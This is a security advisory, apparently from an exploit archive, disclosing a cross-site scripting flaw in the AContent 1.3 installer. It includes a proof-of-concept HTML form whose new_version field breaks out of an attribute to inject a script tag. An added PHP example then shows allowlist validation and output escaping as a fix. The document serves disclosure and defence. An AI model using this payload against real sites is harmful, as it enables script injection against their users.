AContent Content Management System Cross Site Scripting

Published: 2016.12.31
Credit: Ashiyane Digital Security Team
Risk: Low
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+] Version : 1.3
|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12/29/2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code:

<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
<input type="hidden" name="action" value="process" />
<input type="hidden" name="step" value="1" />
<input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />

<input type="submit" name="submit" class="button" value="I Agree" />
<input type="submit" name="submit" class="button" value="I Disagree" /><br />

</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
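
A server-side fix for this class of bug, as an added example that is not AContent's code or the advisory author's: the new_version value is checked against a version pattern and escaped for an HTML attribute before it is written back into the page. It assumes the installer echoes the POSTed new_version into a form field, which the advisory does not show; the function names are hypothetical.

```php
<?php
// Added example, not AContent's code. Function names are hypothetical.
// In the installer the raw value would come from $_POST['new_version'].

// Accept only dotted numeric versions such as "1.3" or "1.3.1".
function clean_version(?string $raw): ?string
{
    if ($raw === null) {
        return null;
    }
    return preg_match('/\A\d+(\.\d+){0,3}\z/', $raw) === 1 ? $raw : null;
}

// Escape for an HTML attribute context: & < > " and ' are all encoded,
// so the value cannot close the attribute or the surrounding tag.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the hidden field with every dynamic part escaped.
function hidden_field(string $name, string $value): string
{
    return '<input type="hidden" name="' . attr($name)
         . '" value="' . attr($value) . '" />';
}

// Constructed sample input: a normal version string and the new_version
// value from the proof-of-concept form above.
$samples = [
    '1.3',
    '1.3\'"/><ScRiPt >alert(123)</ScRiPt>',
];

foreach ($samples as $raw) {
    $version = clean_version($raw);
    if ($version === null) {
        // Reject rather than repair; escape even when echoing it in an error.
        echo 'rejected: ', attr($raw), PHP_EOL;
        continue;
    }
    echo hidden_field('new_version', $version), PHP_EOL;
}
```

Validation and escaping are both kept on purpose: the allowlist stops unexpected values from reaching later install steps, and the escaping covers any other place the value is printed.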



Copyright 2017, cxsecurity.com